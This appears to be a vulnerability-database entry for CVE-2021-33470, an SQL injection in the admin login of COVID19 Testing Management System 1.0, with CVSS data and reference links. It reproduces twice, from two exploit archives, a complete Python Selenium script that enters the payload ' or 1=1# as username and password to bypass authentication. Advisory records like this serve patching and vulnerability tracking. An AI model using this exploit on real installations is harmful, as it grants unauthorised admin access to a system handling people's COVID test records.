Description
COVID19 Testing Management System 1.0 is vulnerable to SQL Injection via the admin panel.
Affected Software
Related
{"id": "CVE-2021-33470", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-33470", "description": "COVID19 Testing Management System 1.0 is vulnerable to SQL Injection via the admin panel.", "published": "2021-05-26T17:15:00", "modified": "2022-04-25T15:15:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33470", "reporter": "cve@mitre.org", "references": ["https://phpgurukul.com/", "https://www.exploit-db.com/exploits/49886", "http://packetstormsecurity.com/files/163014/COVID-19-Testing-Management-System-1.0-SQL-Injection.html", "https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/CVE-nu11-04", "https://www.nu11secur1ty.com/2021/08/covid-19-contact-tracing-system-web-app.html"], "cvelist": ["CVE-2021-33470"], "immutableFields": [], "lastseen": "2022-04-25T17:26:33", "viewCount": 43, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:49886"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163014"]}, {"type": "zdt", "idList": ["1337DAY-ID-36374"]}], "rev": 4}, "score": {"value": 4.9, "vector": "NONE"}, "twitter": {"counter": 2, "modified": "2021-05-29T07:26:20", "tweets": [{"link": "https://twitter.com/threatintelctr/status/1402075701159866371", "text": " NEW: CVE-2021-33470 COVID19 Testing Management System 1.0 is vulnerable to SQL Injection via the admin panel. Severity: CRITICAL https://t.co/jCKNACpaID?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1402075701159866371", "text": " NEW: CVE-2021-33470 COVID19 Testing Management System 1.0 is vulnerable to SQL Injection via the admin panel. Severity: CRITICAL https://t.co/jCKNACpaID?amp=1"}]}, "backreferences": {"references": [{"type": "packetstorm", "idList": ["PACKETSTORM:163014"]}, {"type": "zdt", "idList": ["1337DAY-ID-36374"]}]}, "exploitation": null, "vulnersScore": 4.9}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": ["cpe:/a:covid19_testing_management_system_project:covid19_testing_management_system:1.0"], "cpe23": ["cpe:2.3:a:covid19_testing_management_system_project:covid19_testing_management_system:1.0:*:*:*:*:*:*:*"], "cwe": ["CWE-89"], "affectedSoftware": [{"cpeName": "covid19_testing_management_system_project:covid19_testing_management_system", "version": "1.0", "operator": "eq", "name": "covid19 testing management system project covid19 testing management system"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:covid19_testing_management_system_project:covid19_testing_management_system:1.0:*:*:*:*:*:*:*", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://phpgurukul.com/", "name": "https://phpgurukul.com/", "refsource": "MISC", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/49886", "name": "https://www.exploit-db.com/exploits/49886", "refsource": "MISC", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "http://packetstormsecurity.com/files/163014/COVID-19-Testing-Management-System-1.0-SQL-Injection.html", "name": "http://packetstormsecurity.com/files/163014/COVID-19-Testing-Management-System-1.0-SQL-Injection.html", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/CVE-nu11-04", "name": "https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/CVE-nu11-04", "refsource": "MISC", "tags": []}, {"url": "https://www.nu11secur1ty.com/2021/08/covid-19-contact-tracing-system-web-app.html", "name": "https://www.nu11secur1ty.com/2021/08/covid-19-contact-tracing-system-web-app.html", "refsource": "MISC", "tags": []}]}
{"zdt": [{"lastseen": "2021-12-03T01:57:58", "description": "COVID-19 Testing Management System version 1.0 remote SQL injection exploit based upon the original discovery by Rohit Burke in May of 2021.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "zdt", "title": "COVID-19 Testing Management System 1.0 SQL Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33470"], "modified": "2021-06-08T00:00:00", "id": "1337DAY-ID-36374", "href": "https://0day.today/exploit/description/36374", "sourceData": "# Exploit Title: COVID19 Testing Management System 1.0 - SQL Injection\n(Authentication Bypass)\n# Author: @nu11secur1ty\n# Testing and Debugging: @nu11secur1ty\n# Vendor: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/\n# Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/\n# CVE: CVE-2021-33470\n# Proof: https://github.com/nu11secur1ty/CVE-mitre/blob/main/CVE-2021-33470/CVE-2021-33470.gif\n\n[+] Exploit Source:\n\n#!/usr/bin/python3\n# Author: @nu11secur1ty\n# Debug: @nu11secur1ty\n# CVE: CVE-2021-33470\n\nfrom selenium import webdriver\nimport time\n\n\n#enter the link to the website you want to automate login.\nwebsite_link=\"\nhttp://192.168.1.160/Covid19-TMS%20Project%20Using%20PHP%20and%20MySQL/covid-tms/login.php\n\"\n\n#enter your login username SQL bling injection\nusername=\"nu11secur1ty' or 1=1#\"\n#enter your login password SQL bling injection\npassword=\"nu11secur1ty' or 1=1#\"\n\n# test and proof the SQL injection\n# user: admin\n# password: password\n\n#enter the element for username input field\nelement_for_username=\"username\"\n#enter the element for password input field\nelement_for_password=\"inputpwd\"\n\n#enter the element for submit button by class\nelement_for_submit=\"btn.btn-primary.btn-user.btn-block\"\n\n#browser = webdriver.Safari() #for macOS users[for others use chrome vis\nchromedriver]\nbrowser = webdriver.Chrome() #uncomment this line,for chrome users\n#browser = webdriver.Firefox() #uncomment this line,for chrome users\n\nbrowser.get((website_link))\n\ntry:\nusername_element = browser.find_element_by_name(element_for_username)\nusername_element.send_keys(username)\npassword_element = browser.find_element_by_name(element_for_password)\npassword_element.send_keys(password)\ntime.sleep(3)\nsignInButton = browser.find_element_by_class_name(element_for_submit)\nsignInButton.click()\n\nprint(\"payload is deployed NOW, you have SQL Authentication Bypass =)...\\n\")\n\nexcept Exception:\n#### This exception occurs if the element are not found in the webpage.\nprint(\"Some error occured :(\")\n", "sourceHref": "https://0day.today/exploit/36374", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2021-06-08T14:41:10", "description": "", "cvss3": {}, "published": "2021-06-08T00:00:00", "type": "packetstorm", "title": "COVID-19 Testing Management System 1.0 SQL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-33470"], "modified": "2021-06-08T00:00:00", "id": "PACKETSTORM:163014", "href": "https://packetstormsecurity.com/files/163014/COVID-19-Testing-Management-System-1.0-SQL-Injection.html", "sourceData": "`# Exploit Title: COVID19 Testing Management System 1.0 - SQL Injection \n(Authentication Bypass) \n# Author: @nu11secur1ty \n# Testing and Debugging: @nu11secur1ty \n# Date: 06.08.2021 \n# Vendor: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/ \n# Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/ \n# CVE: CVE-2021-33470 \n# Proof: https://github.com/nu11secur1ty/CVE-mitre/blob/main/CVE-2021-33470/CVE-2021-33470.gif \n \n[+] Exploit Source: \n \n#!/usr/bin/python3 \n# Author: @nu11secur1ty \n# Debug: @nu11secur1ty \n# CVE: CVE-2021-33470 \n \nfrom selenium import webdriver \nimport time \n \n \n#enter the link to the website you want to automate login. \nwebsite_link=\" \nhttp://192.168.1.160/Covid19-TMS%20Project%20Using%20PHP%20and%20MySQL/covid-tms/login.php \n\" \n \n#enter your login username SQL bling injection \nusername=\"nu11secur1ty' or 1=1#\" \n#enter your login password SQL bling injection \npassword=\"nu11secur1ty' or 1=1#\" \n \n# test and proof the SQL injection \n# user: admin \n# password: password \n \n#enter the element for username input field \nelement_for_username=\"username\" \n#enter the element for password input field \nelement_for_password=\"inputpwd\" \n \n#enter the element for submit button by class \nelement_for_submit=\"btn.btn-primary.btn-user.btn-block\" \n \n#browser = webdriver.Safari() #for macOS users[for others use chrome vis \nchromedriver] \nbrowser = webdriver.Chrome() #uncomment this line,for chrome users \n#browser = webdriver.Firefox() #uncomment this line,for chrome users \n \nbrowser.get((website_link)) \n \ntry: \nusername_element = browser.find_element_by_name(element_for_username) \nusername_element.send_keys(username) \npassword_element = browser.find_element_by_name(element_for_password) \npassword_element.send_keys(password) \ntime.sleep(3) \nsignInButton = browser.find_element_by_class_name(element_for_submit) \nsignInButton.click() \n \nprint(\"payload is deployed NOW, you have SQL Authentication Bypass =)...\\n\") \n \nexcept Exception: \n#### This exception occurs if the element are not found in the webpage. \nprint(\"Some error occured :(\") \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/163014/covid19tms10-sql.py.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
CVE-2021-33470
